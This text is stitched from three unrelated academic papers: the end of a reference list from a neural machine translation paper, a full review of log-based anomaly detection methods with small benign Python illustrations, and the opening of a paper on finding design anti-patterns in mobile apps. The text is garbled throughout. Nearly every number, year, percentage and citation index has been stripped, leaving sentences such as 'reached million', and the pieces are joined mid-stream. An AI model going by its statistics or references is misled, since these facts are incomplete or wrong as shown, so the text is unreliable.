processing. rico sennrich, barry haddow, and alexandra birch. a. controlling politeness in neural machine trans- lation via side constraints. in the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, san diego california, usa, june - , , pages – . rico sennrich, barry haddow, and alexandra birch. b. neural machine translation of rare words with subword units. in proceedings of the th annual meet- ing of the association for computational linguistics. ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in advances in neural information processing systems, pages – . yulia tsvetkov, sunayana sitaram, manaal faruqui, guillaume lample, patrick littell, david mortensen, alan w black, lori levin, and chris dyer. . poly- glot neural language models: a case study in cross- lingual phonetic representation learning. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics: human language technologies, pages – , san diego, california, june. association for computa- tional linguistics. yonghui wu, mike schuster, and zhifeng chen et al. . google’s neural machine translation system: bridging the gap between human and machine translation. arxiv preprint arxiv: . v . hayahide yamagishi, shin kanouchi, and mamoru ko- machi. . 
controlling the voice of a sentence in japanese-to-english neural machine translation. in proceedings of the rd workshop on asian translation, pages – , osaka, japan, december. jie zhou, ying cao, xuguang wang, peng li, and wei xu. . deep recurrent models with fast-forward connections for neural machine translation. transac- tions of the association for computational linguistics, : – . barret zoph and kevin knight. . multi-source neural translation. in naacl hlt , the confer- ence of the north american chapter of the association for computational linguistics: human language tech- nologies, san diego california, usa, june - , , pages – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - review of anomaly detection based on log analysis wu xudong laboratory of wireless network and intelligent system xi'an technological university xi'an, , china e-mail: wuxudong_wxd@ .com abstract—the development of the internet and the emergence of large-scale systems promote the rapid development of society, and bring a lot of convenience to people. then comes the problem of network security, privacy theft, malicious attacks and other illegal acts still exist, a qualified software system will log the key operation behavior of the software. therefore, log analysis has become an important means of anomaly detection. based on log analysis, this paper consulted the related literature on anomaly detection, elaborated the research status of anomaly detection based on log analysis from the aspects of template matching, rule self-generation and outlier analysis, and analyzed the challenges faced by anomaly detection based on log analysis. keywords-log analysis; distributed; big data; anomaly detection i. introduction with the development of the internet, big data and artificial intelligence have penetrated into people's lives, unknowingly changing the way people live, food, and transportation, making people's lives faster, more efficient, and easier. research in various fields of computer is moving towards bionics, including human-like big data processing, human-like computer vision and image processing, human-like voice input, etc. these studies make the computer in a domain not only clairvoyance, shunfeng ear, can also save and process a large number of various types of data obtained from various aspects, forming an invisible "superman" individual. in the past years, with the rapid development of the internet in china, people's lifestyles have undergone tremendous changes. chinese internet users continue to grow. according to cnnic’s th "statistical report on internet development in china", as of june , the number of internet users in china reached million, an increase of . million from the end of , and the internet penetration rate reached . %, compared with the end of . an increase of . percentage points. the proportions of using desktop computers, laptop computers and tablet computers to surf the internet were . %, . % and . % respectively. these not only reflect the continuous increase in the number of netizens, but also the rapid and continuous growth of log data from the side. the log records the time point selected by the developer that is worthy of attention and the changes of state or event that is worthy of attention at this point in time. it is the most important source of information for understanding the operating status of the system and diagnosing system problems. 
traditionally, system maintainers use tools such as grep and awk to filter keywords such as "error" or "exception" in the log to find problems in system operation. when keyword filtering cannot meet the demand, more experienced personnel write scripts that impose more complex filtering rules. the cost of this method is very high: writing effective scripts requires a deep understanding of the target system, and scripts written for a specific target system cannot be applied to other systems, so their generality is poor. even setting the cost aside, this approach is no longer feasible for today's software systems. the ever-increasing scale of log data and network security issues confront network managers with severe challenges: they must not only keep the network running stably and efficiently, but also provide network services that are as secure as possible. fortunately, distributed computing technology has matured in recent years. distributed computing platforms such as hadoop, spark, flume and storm are being accepted and applied by more and more companies and are gradually being used across industries for data storage and for online or offline analysis, which creates an opportunity for log-based anomaly detection. at the same time, security and privacy issues in the network keep emerging. such problems take many forms, occur all the time and cause huge losses; human attacks, mis-operation and network equipment failures can all give rise to them. distributed denial-of-service attacks, zombie code, trojan horses, ransomware, worms and other malicious software have a strongly negative impact on people's lives: once malware runs, it may cause irreversible losses to a company's economy and poses a great threat to people's privacy. one study showed [ ][ ] that, in random sample surveys of large-scale systems, more than half of the system failure problems were not logged at all. in such cases maintenance personnel must find the cause of the problem manually, and because of the large amount of code the time invested is much greater. high-quality logging in the code greatly improves detection efficiency after a program error occurs, and log records at key locations are an important means of ensuring that an abnormality can be quickly located and repaired. it is therefore necessary to add log records at key positions in the program, and log analysis has become an important method of anomaly detection.
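as a concrete, minimal illustration of the traditional keyword-filtering workflow described above, the following sketch scans log lines for typical suspicious keywords. the sample log lines and the keyword list are placeholders invented for illustration, not taken from the original text.

```python
import re

# keywords typically scanned for in traditional manual log inspection
KEYWORDS = re.compile(r"\b(error|exception|fail(ed|ure)?)\b", re.IGNORECASE)

def filter_log(lines):
    """yield (line_number, line) pairs whose text matches a suspicious keyword."""
    for lineno, line in enumerate(lines, start=1):
        if KEYWORDS.search(line):
            yield lineno, line.rstrip()

if __name__ == "__main__":
    sample_log = [
        "2021-06-01 12:00:01 INFO  service started",
        "2021-06-01 12:00:05 ERROR disk quota exceeded",
        "2021-06-01 12:00:09 WARN  retrying connection",
        "2021-06-01 12:00:10 Exception in thread 'main': NullPointerException",
    ]
    for lineno, line in filter_log(sample_log):
        print(f"{lineno}: {line}")
```

as the surrounding text argues, this kind of fixed-keyword filter is cheap to write but brittle: every new system needs its own rules, which is exactly the limitation that motivates automated log anomaly detection.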
this article first introduces the related knowledge of log analysis and anomaly detection, then summarizes the current research status of log anomaly detection from the aspects of template matching, rule generation and outlier analysis, analyzes and classifies the surveyed articles, and summarizes the types of log-based anomaly detection and the problems that remain difficult to solve during detection. finally, future work on anomaly detection based on log analysis is outlined. ii. related technologies and concepts of log anomaly detection a. log analysis a log in a computer system is a record of events generated as network equipment, applications and systems run. each line records the date, time, type, operator and a description of the related operation; figure shows a partial log record of an application (figure : part of the application log). in practice the log data generated by a system is very large and conforms to the v characteristics defined for big data, namely volume, variety, velocity and value. if these log data are simply shelved they only occupy storage space, while if they are used properly they bring great value. because log data have these characteristics, manual analysis is unrealistic, and log analysis tools must be used to exploit their value fully. several mainstream log analysis tools are in current use. splunk is a full-text search engine for machine data and a hosted log management tool; its main functions include log aggregation, search, meaning extraction, grouping, formatting and visualization of results. elk is composed of three parts: elasticsearch, logstash and kibana. elasticsearch is a near real-time search platform; compared with mongodb it has more comprehensive functions and is very capable of full-text search, and it can index, search, sort and filter documents. logstash is a log collection tool that can collect messages from local, network and other sources and send them to elasticsearch. kibana provides a visual web interface with a rich dashboard. b. store log data because of the huge volume of log data and its semi-structured nature, a traditional structured database cannot meet the storage requirements of log data.
hdfs (hadoop distributed file system) can provide high-throughput data access, is well suited to large-scale data sets and can be deployed on low-cost machines, so it can meet the storage requirements of log data. in the experiments the log data generated by the system are stored in hdfs, and a properly configured hdfs automatically backs up the data. an input data file is divided into fixed-size blocks, with a typical block size of mb, and each block is stored on different nodes. each block normally has three copies: the first copy is stored on the same node as the client, the second replica on a node in a different rack, and the third replica on another node in the same rack as the second replica. c. log data preprocessing log data preprocessing has three goals: (1) filtering "non-conforming" data and cleaning meaningless data; (2) format conversion and regularization; (3) filtering and separating the basic data needed by the subsequent statistical requirements. for filtering and cleaning, the log data generated by a system may be non-conforming or meaningless, so before format conversion and normalization a check is added to decide whether a record is standard and meaningful; if not, the record is treated as useless and the next record is processed directly. for format conversion and regularization, the characteristics of the data are analyzed first: the fields in each record are separated by spaces, so each record is split on spaces, and fields that contain internal spaces are handled specially with regular-expression matching. after segmentation each field is normalized, including time format conversion, numeric type conversion and path completion. for separating data with different needs, the required fields are extracted according to the needs of the subsequent detection algorithms. d. anomaly detection anomalies usually include outliers, fluctuation points and abnormal event sequences. generally, given an input time series x, an outlier is a timestamp-value pair (t, x_t) in which the observed value x_t differs from the expected value of the series at time t. a fluctuation point is a point of a given time series x whose state or behavior at some time t differs from the values before and after t. an abnormal time series is a member of a given set of time series x = {x_i} that is inconsistent with most of the other series in the set. the abnormal point is marked with a box in figure (figure : outlier feature). peng dong et al. [ ] divide anomaly detection methods into three categories: techniques based on statistical models, techniques based on proximity, and techniques based on density. in data mining, anomaly detection identifies items, events or observations that do not match the expected pattern or the other items in a data set. abnormal items often correspond to bank fraud, structural defects, medical problems, text errors and other kinds of problems. anomalies are also known as outliers, novelties, noise, deviations or exceptions. in the detection of abuse and network intrusion in particular, the interesting objects are often not rare objects but unexpected activities.
this pattern does not follow the usual statistical definition of outliers as rare objects, so many anomaly detection methods fail on such data unless appropriate aggregation is carried out; by contrast, a cluster analysis algorithm may be able to detect the micro-clusters formed by these patterns. there are three types of anomaly detection methods. under the assumption that most instances in the data set are normal, unsupervised anomaly detection can work on unlabeled test data by finding the instances that match the rest of the data least. supervised anomaly detection requires a data set labeled "normal" and "abnormal" and involves training a classifier (the key difference from many other statistical classification problems being the inherent class imbalance of anomaly detection). semi-supervised anomaly detection builds a model of normal behavior from a given normal training data set and then scores how likely it is that a test case was generated by the learned model. iii. research status of log anomaly detection technology anomaly detection refers to the process of finding data patterns that do not meet expectations [ ]. anomaly detection based on log data can essentially be regarded as a classification problem: distinguishing normal behavior from abnormal behavior in a large amount of log behavior data and determining the specific attack method from the abnormal behavior [ ]. while a server is running, the log records the behavior of users throughout the access process, so information about abnormal users can be found by processing the log; analyzing logs has therefore become one of the most effective methods for detecting abnormal user behavior [ , , ]. with the rapid development of big data, log-based anomaly detection methods fall into three categories: model-based techniques, proximity-based techniques and density-based techniques. a. model-based technology a model-based technique first builds a data model; anomalies are the objects that the model cannot fit well. since abnormal and normal objects can be regarded as defining two different classes, classification techniques can be used to build models of the two classes. however, the training set is critical in classification, and because anomalies are relatively rare it is difficult to detect new kinds of anomalies that may appear [ ]. in , wang zhiyuan et al. [ ] used log templates to detect anomalies: the logs were cleaned first, then edit distance was used to cluster the text into log templates; on top of the templates, tf-idf (term frequency-inverse document frequency) was used to form feature vectors; logistic regression, naive bayes, support vector machines and other weak classifiers were trained to obtain score feature vectors; a strong classifier was built from the score feature vectors with a random forest; and finally mutual information was used to measure the correlation between the true templates and the clustered templates, with precision and recall used to assess the classification effect and compare the classifiers.
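the template-plus-tf-idf classification idea described above can be sketched in a few lines. the following is a minimal illustration, not the implementation of the cited work: the toy log templates, the labels and the classifier choices are invented, and scikit-learn is assumed to be available.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier

# toy log templates (in practice these come from clustering raw log lines by edit distance)
templates = [
    "connection established from <ip>",
    "user <id> logged in",
    "failed to allocate memory for block <id>",
    "exception while writing block <id> to datanode",
    "heartbeat received from datanode <ip>",
    "error: checksum mismatch for block <id>",
]
labels = [0, 0, 1, 1, 0, 1]  # 0 = normal, 1 = abnormal (invented labels)

# tf-idf features over the template text
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform(templates)

# a weak classifier and a stronger ensemble, loosely following the scheme described above
weak = LogisticRegression(max_iter=1000).fit(X, labels)
strong = RandomForestClassifier(n_estimators=100, random_state=0).fit(X, labels)

new_line = ["error: checksum mismatch for block 42"]
X_new = vectorizer.transform(new_line)
print("weak classifier  :", weak.predict(X_new))
print("strong classifier:", strong.predict(X_new))
```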
siwoon et al. [ ] proposed a new data storage and analysis architecture based on apache hive to process large amounts of hadoop log data, using moving averages and -sigma techniques to design and implement three anomaly detection methods: a basic method, a linear weighting method and an exponential weighting method. the basic method computes the average line and standard deviation for anomaly detection but suffers from repeated detections; to address this, the two weighted methods are introduced, where the linear weighting method assigns weights in proportion to the position of the log item and the exponential weighting method assigns weights exponentially on top of the basic method. the effectiveness of the proposed methods was evaluated in a hadoop environment with a name node and four data nodes. fu et al. [ ] proposed a technique for anomaly detection in unstructured system logs that does not require any application-specific knowledge, including a method for extracting log keys from free-text messages; the false positive rate of their experiments on the hadoop platform is about %. xu et al. [ ] matched the log format against the source code to find the relevant variables, extracted features of the corresponding log variables with a bag-of-words model, reduced the dimensionality of these features with principal component analysis, detected abnormal log files according to the maximum separability given by principal component analysis, and finally used a decision tree to visualize the results. fronza et al. [ ] represented operation sequences with random indexing, characterized the operations in each log according to their context, and then used a support vector machine to associate each sequence with the fault or non-fault category in order to predict system failures. peng et al. [ ] applied text mining to classify messages in log files into common cases, improved classification accuracy by considering the temporal characteristics of log messages, and used visualization tools to evaluate and verify the effective time for the system management mode. b. technology based on proximity proximity-based techniques consider proximity measures between objects, such as distance. zhang luqing et al. [ ] proposed a web attack data mining algorithm based on the anomaly degree of outliers, which first clusters http requests and then builds a detection model that approximates a normal distribution. the algorithm takes the arithmetic mean of each numerical attribute and the most frequent value of each categorical attribute as the centroids of the numerical and categorical attributes; after combining them, the centroid t of the data set is obtained, and the distance between an object p and the centroid t is taken as the abnormality of p. experiments confirmed that the algorithm achieves a high detection rate. jakub breier et al. [ ] proposed a log file anomaly detection method that dynamically generates rules from patterns in sample files and can learn new types of attacks while minimizing the need for human intervention; the implementation uses the apache hadoop framework to provide distributed storage and distributed data processing so that parallel processing speeds up execution.
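the basic moving-average plus sigma-rule scheme attributed to siwoon et al. above can be sketched as follows. this is an illustrative reconstruction rather than the authors' code: the window size, the three-standard-deviation threshold and the synthetic per-minute log counts are all assumptions.

```python
import numpy as np

def sigma_rule_outliers(counts, window=10, k=3.0):
    """flag indices whose value deviates from the trailing moving average
    by more than k standard deviations (the unweighted 'basic' variant)."""
    counts = np.asarray(counts, dtype=float)
    flags = []
    for i in range(window, len(counts)):
        history = counts[i - window:i]
        mu, sigma = history.mean(), history.std()
        if sigma > 0 and abs(counts[i] - mu) > k * sigma:
            flags.append(i)
    return flags

if __name__ == "__main__":
    rng = np.random.default_rng(0)
    counts = rng.poisson(lam=20, size=120).astype(float)  # synthetic log volume per minute
    counts[60] = 95  # injected burst
    print("flagged positions:", sigma_rule_outliers(counts))
```

the linear and exponential variants mentioned in the text would differ only in how the history values are weighted before the mean and standard deviation are computed.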
since incremental mining algorithms based on the local outlier factor require multiple scans of the data set, zhang zhongping et al. [ ] proposed a streaming-data outlier mining algorithm (somrnn) based on reverse k nearest neighbors; using a sliding window model, updating the current window requires only one scan, which improves the efficiency of the algorithm. grace et al. [ ] used data mining methods to analyze web log files and obtain more information about users; their work describes log file formats, types and contents and gives an overview of the web usage mining process. liang bao et al. [ ] proposed a general method for mining console logs to detect system problems: they first give formal problem definitions, then extract the set of log statements from the source code and generate a reachability graph showing the reachability of log statements; log files are then analyzed to create log messages by combining information about the log statements with information retrieval techniques, the messages are grouped according to execution unit, and a detection algorithm based on a probabilistic suffix tree is proposed to organize and distinguish the significant statistical characteristics of the sequences. experiments on the cloudstack test platform and a hadoop production system showed that, compared with four existing anomaly detection algorithms, this algorithm detects abnormal operation effectively. because abnormal points are few in practice, liu et al. [ ] proposed an isolation-based anomaly detection algorithm; the isolation trees it builds converge quickly but require sub-sampling to achieve high accuracy. c. density-based technology density-based techniques treat objects in low-density areas as abnormal points. the density-based local outlier factor algorithm (lof) has high time complexity and is not suitable for outlier detection on large-scale or high-dimensional data sets. wang jinghua et al. [ ] proposed a local outlier detection algorithm, nlof. li shaobo et al. [ ] proposed a density-based abnormal data detection algorithm, gswclof, which introduces the concepts of a sliding time window and a grid: within the sliding window the grid subdivides the data, information entropy is used to prune and filter the data in the grid cells so that most of the normal data are eliminated, and finally an outlier factor is used to make the final judgment on the remaining data. wang qian et al. [ ] proposed a density-based detection algorithm that introduces the local outlier factor (lof) and judges whether a datum is abnormal by its lof value; the algorithm is only suitable for static data, because once the data change the lof values of all data must be recalculated, so it adapts poorly and is not suitable for dynamic data. pukelsheim [ ] assumed that the data sample follows a univariate gaussian distribution and judged test samples lying more than two or three standard deviations away as abnormal.
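to make the two generic detector families just discussed concrete, here is a minimal sketch using the scikit-learn implementations of the local outlier factor and isolation forest. the synthetic two-dimensional data and all parameter values are assumptions for illustration, not settings from the cited works.

```python
import numpy as np
from sklearn.neighbors import LocalOutlierFactor
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
normal = rng.normal(loc=0.0, scale=1.0, size=(200, 2))   # dense normal cluster
outliers = rng.uniform(low=6.0, high=8.0, size=(5, 2))   # sparse abnormal points
X = np.vstack([normal, outliers])

# density-based: LOF compares each point's local density with that of its neighbours
lof = LocalOutlierFactor(n_neighbors=20)
lof_labels = lof.fit_predict(X)             # -1 = outlier, 1 = inlier

# isolation-based: anomalies are isolated with fewer random splits
iso = IsolationForest(n_estimators=100, random_state=0).fit(X)
iso_labels = iso.predict(X)                 # -1 = outlier, 1 = inlier

print("lof flagged      :", np.where(lof_labels == -1)[0])
print("isolation forest :", np.where(iso_labels == -1)[0])
```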
iv. challenges faced by log anomaly detection technology several obstacles stand between the moment a system abnormality occurs and its successful detection: (1) the exception is not logged at all; (2) the format of the exception log records is not standardized; (3) the exception log cannot be sent to the processing end in time; (4) abnormal log messages are lost in transmission; (5) the detection algorithm is not accurate enough. the occurrence of any one or more of these conditions leads to failure of anomaly detection. a. real-time the purpose of anomaly detection is to find anomalies and surface them so that they can be handled; if the delay from logging, to anomaly detection, to manual analysis, to anomaly elimination is too long, anomalies persist for too long and the losses become more serious. if real-time performance can be guaranteed, the efficiency of anomaly elimination improves greatly. b. detection accuracy many factors affect detection accuracy, such as irregular log formats and inappropriate algorithms. these problems directly reduce the accuracy of anomaly detection, which also means that log anomaly detection cannot be completely separated from the intervention of technicians. moreover, even when the literature uses the same benchmark data set, most studies do not state the size or proportion of labeled data, and the sizes of training and test sets and the evaluation indicators differ; the different combinations of measurements make the research results hard to compare with each other. c. the versatility of detection algorithms there are currently many anomaly detection algorithms at home and abroad, such as isolation forest, one-class svm, robust covariance, k-means, principal component analysis, -ε and others. these algorithms each have advantages and disadvantages and are not suitable for every anomaly detection task. because logs are unstructured and far from uniform, a specific algorithm is needed for a specific kind of log, or a specific algorithm must be adapted to achieve a higher detection rate; this "localization" of algorithms requires specialized technical personnel, which increases the cost of detection. d. tag data log data are plentiful while abnormal data are very rare, and it is very difficult to mark the small amount of abnormal data within a large volume of data. the lack of publicly available labeled data as an experimental basis creates great difficulties for anomaly detection. v. research direction of anomaly detection based on the current state of anomaly detection technology and the problems above, the challenges and future research directions of anomaly detection can be summarized as follows. traffic data often have high feature dimensionality, and the euclidean distance used in sampling methods cannot measure the spatial distribution of the samples well. the data distribution settings of supervised learning and semi-supervised learning differ, and under unbalanced data most existing semi-supervised methods simply transplant traditional techniques into semi-supervised learning; the traditional ways of handling the imbalance problem are therefore not necessarily suitable for semi-supervised learning and need further research.
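as a small illustration of the semi-supervised setting discussed in this section (a model of normal behavior is learned from data assumed to be normal and then used to score new observations), the following sketch uses a one-class svm. the synthetic data, the kernel and the nu value are arbitrary choices, not taken from any of the surveyed works.

```python
import numpy as np
from sklearn.svm import OneClassSVM

rng = np.random.default_rng(1)

# training data assumed to contain only normal behaviour (semi-supervised setting)
train_normal = rng.normal(loc=0.0, scale=1.0, size=(300, 3))

# test data: mostly normal, with a few far-away abnormal observations
test = np.vstack([
    rng.normal(loc=0.0, scale=1.0, size=(20, 3)),
    rng.normal(loc=7.0, scale=0.5, size=(3, 3)),
])

model = OneClassSVM(kernel="rbf", nu=0.05, gamma="scale").fit(train_normal)
predictions = model.predict(test)  # +1 = fits the normal model, -1 = anomaly

print("predicted anomalies at indices:", np.where(predictions == -1)[0])
```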
although the research on data imbalance has achieved good results in the field of network security, there are very few researches on the imbalance problem in semi supervised learning. most of the semi supervised methods applied in the field of anomaly detection use ensemble learning to solve the class imbalance. in the future, we can solve the problem of anomaly detection by combining the latest achievements in the field of data imbalance under semi supervision. at present, many network traffic feature selection and extraction are limited to one dimensional features or simple combination of multi-dimensional features, while traffic anomalies usually show in multi-dimensional features. how to effectively fuse multi-dimensional features, learn data flow features from multiple perspectives, and use a small amount of labeled data for semi supervised integration algorithm synthesis results to reduce information loss is a challenging research topic. semi supervised dimensionality reduction is a feasible method in the field of anomaly detection. how to find a more effective way to deal with high-dimensional sparse samples and continuous variables and further improve the real-time performance of detection model is of great significance. the learning effect of the combination of active learning and semi supervised learning strategy is better than that of single method. the combination of semi supervised learning and active learning can actively find effective supervision information. through effective supervision information, unlabeled sample data can be used better, thus improving the accuracy of the model and solving speed. however, the research on the combination of semi supervised learning and active learning is rare, and there is a large space for improvement. incremental semi supervised anomaly detection is more in line with the actual anomaly detection. it makes full use of the data results processed before in the training process. it should have more in-depth research in the field of network security. in the future, we can consider introducing the incremental algorithm of natural language technology into specific anomaly detection. semi supervised clustering algorithm uses the traditional clustering algorithm to introduce the supervised information to complete the semi supervised learning, so it can also expand the semi supervised clustering algorithm such as density international journal of advanced network, monitoring and controls volume , no. , clustering and spectral clustering. in addition, some traffic data are high-dimensional and sparse. however, most of the existing clustering algorithms are not suitable for processing high-dimensional sparse data. in future research, it is necessary to make further discussion. in general, semi supervised learning can help improve performance by using unlabeled data, especially when the number of labeled data is limited. however, in some cases, the selection of unreliable unlabeled data may mislead the formation of classification boundaries and eventually lead to the degradation of semi supervised learning performance. therefore, how to use unlabeled data safely is a research focus in the future. it can combine multiple semi supervised anomaly detection methods and technologies to achieve more efficient network data detection and obtain more accurate prediction results. in addition, in semi supervised anomaly detection, it is a challenging research topic to minimize the additional impact on the network. vi. 
conclusion machine learning faces many challenges in the field of abnormal traffic detection. the biggest difficulty is the lack of label data. in practice, only a limited number of tagged data is available, while most of the data is unmarked. in addition, although there are a large number of normal access data, there are few abnormal traffic samples and various attack forms, which make it difficult to learn and train the model. semi supervised learning is an effective solution, which can make use of both unlabeled data and labeled data, which can alleviate this problem. for anomaly detection based on log analysis, domestic and foreign countries have made certain progress and achieved various results. various algorithms such as template matching, automatic rule generation, outlier analysis, and statistical data have certain effects, which are of great significance to network security and intelligent operation and maintenance. future research will continue to focus on real-time performance to ensure that abnormalities can be detected as quickly as possible. improve detection accuracy, minimize manual intervention or cancel manual intervention. study the versatility of the algorithm, so that an algorithm can adapt to log analysis in different environments as much as possible. references [ ] yuan d, park s, huang p, liu y, lee mm, tang x, zhou y, savage s. be conservative: enhancing failure diagnosis with proactive logging. in: proc. of the th symp. on operating systems design and implementation (osdi). . ~ . [ ] yuan d, park s, zhou y. characterizing logging practices in open-source software. in: proc. of the int'l conf. on software engineering. . ~ . [doi: . /icse. . ]. [ ] peng dong. intelligent operation and maintenance: building a large-scale distributed aiops system from zero. electronic industry press, . isbn - - - - p -p . [ ] varun chandola, arindam banerjee, vipin kumar. anomaly detection: a survey[j]. acm computing surveys, , ( ). [ ] davis j j, clark a j. data preprocessing for anomaly based network intrusion detection: a review[j]. computers & security, , ( - ): - . [ ] q. lin, h. zhang, j. lou, y. zhang and x. chen, "log clustering based problem identification for online service systems," ieee/acm th international conference on software engineering companion (icse-c ), austin, tx, , pp. - . [ ] pecchia a, cotroneo d, kalbarczyk z, et al. improving log-based field failure data analysis of multi-node computing systems[c]. ieee, . [ ] tambe r, karabatis g, janeja v p. context aware discovery in web data through anomaly detection[j]. international journal of web engineering and technology, , ( ): . [ ] wang xiaodong, zhao yining, xiao haili, chi xuebin, wang xiaoning. detection method of abnormal log flow pattern in multi-node system [j/ol]. journal of software: - [ - - ]. [ ] wang zhiyuan, ren chongguang, chen rong, qin li. anomaly detection technology based on log template[j]. intelligent computers and applications, , ( ): - + . [ ] son s, gil ms, moon ys. [ieee ieee international conference on big data and smart computing (bigcomp)-jeju island, south korea ( . . - . . )] ieee international conference on big data and smart computing (bigcomp)-anomaly detection for big log data using a hadoop ecosystem[j]. : - . [ ] fu, q., lou, jg, wang, y., & li, j. ( ). execution anomaly detection in distributed systems through unstructured log analysis. in proceedings of the ninth ieee international conference on data mining, icdm ' , (pp. – ). washington, dc: ieee computer society. doi: . 
/icdm. . . international journal of advanced network, monitoring and controls volume , no. , [ ] xu w, et al. large-scale system problems detection by mining console logs[j]. proceedings of the acm sigops symposium on operating systems principles big sky mt, : . [ ] ilenia fronza, alberto sillitti, giancarlo succi, mikko terho, jelena vlasenko. failure prediction based on log files using random indexing and support vector machines[j]. journal of systems and software, , ( ): - . [ ] peng w, li t, ma s. mining logs files for data-driven system management. acm sigkdd explorations newsletter, , ( ): - . [ ] zhang luqing. web attack data mining algorithm based on outlier anomaly[j]. ship electronic engineering, , ( ): - . [ ] breier j, jana branišová. a dynamic rule creation based anomaly detection method for identifying security breaches in log records[j]. wireless personal communications, , ( ): - . [ ] zhang zhongping, liang yongxin. algorithm for mining outliers in flow data based on anti-k nearest neighbors[j]. computer engineering, , ( ): - . [ ] grace, l., maheswari, v., & nagamalai, d. ( ). web log data analysis and mining. in n. meghanathan, b. kaushik, & d. nagamalai (eds.), advanced computing, communications in computer and information science (vol. , pp. – ). berlin: springer. [ ] liang bao, qian li, peiyao lu, jie lu, tongxiao ruan, ke zhang. ( ). execution anomaly detection in large-scale systems through console log analysis. the journal of systems & software ( ) – . [ ] liu f t, ting k m, zhou z h. isolation-based anomaly detection[j]. acm transactions on knowledge discovery from data, , ( ): - . [ ] wang jinghua, zhao xinxiang, zhang guoyan, liu jianyin. nlof: a new density-based local outlier detection algorithm [j]. computer science, , ( ): - . [ ] li shaobo, meng wei, wei jinglei. density-based abnormal data detection algorithm gswclof[j]. computer engineering and applications, , ( ): - . [ ] wang qian, liu shuzhi. improvement of local outlier data mining method based on density [j]. application research of computers, , ( ): - + . [ ] pukelsheim f. the three sigma rule[j]. the american statistician, , ( ): - . reverse engineering approach for improving the quality of mobile applications reverse engineering approach for improving the quality of mobile applications eman k. elsayed , kamal a. eldahshan , enas e. el-sharawy , and naglaa e. ghannam department of mathematical and computer science, faculty of science, al-azhar university, (girls branch), cairo, egypt department of mathematical and computer science, faculty of science, al-azhar university, cairo, egypt computer department, college of science and humanities in jubail, imam abdulrahman bin faisal university, kingdom of saudi arabia abstract background: portable-devices applications (android applications) are becoming complex software systems that must be developed quickly and continuously evolved to fit new user requirements and execution contexts. applications must be produced rapidly and advance persistently in order to fit new client requirements and execution settings. however, catering to these imperatives may bring about poor outline decisions on design choices, known as anti-patterns, which may possibly corrupt programming quality and execution. thus, the automatic detection of anti-patterns is a vital process that facilitates both maintenance and evolution tasks. additionally, it guides developers to refactor their applications and consequently enhance their quality. 
methods: we proposed a general method to detect mobile applications' anti-patterns that can detect both semantic and structural design anti-patterns. the proposed method works via reverse-engineering and ontology, using a uml modeling environment, an owl ontology-based platform and ontology-driven conceptual modeling. we present and test a new method that generates the owl ontology of mobile applications, analyzes the relationships among object-oriented anti-patterns and offers ways to resolve them, detecting and treating the different semantic and structural design anti-patterns that occurred in the analyzed mobile applications. we chose the mobile applications randomly; selecting a browser is not a criterion in this method because the proposed method is applied at the design level. we also demonstrate a semantic integration method that reduces the incidence of anti-patterns using ontology merging on mobile applications. results: the proposed method detected semantic and structural design anti-patterns which appeared , times in a random sample of mobile applications. the proposed method introduced a new classification of the anti-patterns into four groups: "the anti-patterns in the class group" is the group with the maximum occurrences of anti-patterns, and "the anti-patterns in the operation group" is the smallest one, with the minimum occurrences of the anti-patterns detected by the proposed method. the results also showed the correlation between the selected tools, modelio, the protégé platform and the oled editor of ontouml; there was a high positive relation between modelio and protégé, which implies that combining both increases the accuracy of anti-pattern detection. in evaluating and analyzing the suitable integration method, we applied the different methods to homogeneous mobile applications and found that using ontology increased the detection percentage by approximately . %, in addition to guaranteeing consistency. subjects software engineering keywords mobile applications, reverse engineering, uml, ontouml, anti-patterns, ontology engineering introduction mobile applications take center stage in our lives today. we use them anywhere, at any time and for everything: to browse websites, shop, search for whatever we need and handle basic administration such as banking. given the importance of mobile applications, their reliability and quality are critical.
like any other applications, the initial design of mobile applications is affected by bug-settling and the introduction of new properties, which change the initial design; this can occasionally affect the quality of design (parnas, ). this aspect is known as software degeneration, which can exist in the form of design flaws or anti-patterns (eick et al., ). one of the most important factors in the development of software systems is improving software quality. the success of software design depends on the availability of quality elements such as maintainability, manageability, testability, and performance. these elements are adversely affected by anti-patterns (afjehei, chen & tsantalis, ; yamashita & moonen, ). anti-patterns are bad practice in software design. the automatic detection of anti-patterns is a good way to support maintenance, uncomplicate evolution tasks, and improve usability. in addition to the general advantages of detecting anti-patterns, we think that detecting anti-patterns provides developers with a way to ensure that the detected anti-patterns will not be repeated in applications revisions. also, detecting anti-patterns may improve both operational characteristics and user experience. we note that there are many other approaches interested in detecting anti-patterns in the code level as introduced by morales et al. ( ) and alharbi et al. ( ). however, it has been noted that anti-pattern detection at the design level reduces many code anti-patterns and is more general. according to raja ( ), engineering is the process of designing, manufacturing, assembling, and maintaining products and systems. engineering has two types, forward engineering, and reverse engineering (re) as presented by raja ( ). chikofsky & cross ( ) defined re as the process of analyzing software systems to identify the components of the systems and the interrelationships between them and presenting the systems in other forms or at a higher level of abstraction. the term re according to our approach, refers to the process of generating uml diagrams followed by generating owl ontologies of mobile applications through importing and analyzing the bytecode. generally, we can use ontology re-engineering for direct incorporation as an ontology development method (obrst et al., ) by allowing the designer to analyze the common components dependence. elsayed et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ designing a pattern of mobile application remains an ongoing research challenge. the proposed approach aims to detect structural and semantic anti-patterns in the design of mobile applications as well as to show which method is better for the integration of applications. motivated by the research mentioned above, the major contributions of this paper are sixfold: � presenting a new method for generating owl ontology of mobile applications. � presenting a general method for enhancing the design of a pattern of a mobile application. � illustrating how the proposed method can detect both structural and semantic anti-patterns in the design of mobile applications. � describing how we evaluate the proposed method in mobile applications. showing how it detects and treats designs’ semantic and structural anti-patterns that appeared , times. � showing how semantic integration among mobile applications decreases the occurrences of anti-patterns in the generated mobile application pattern. 
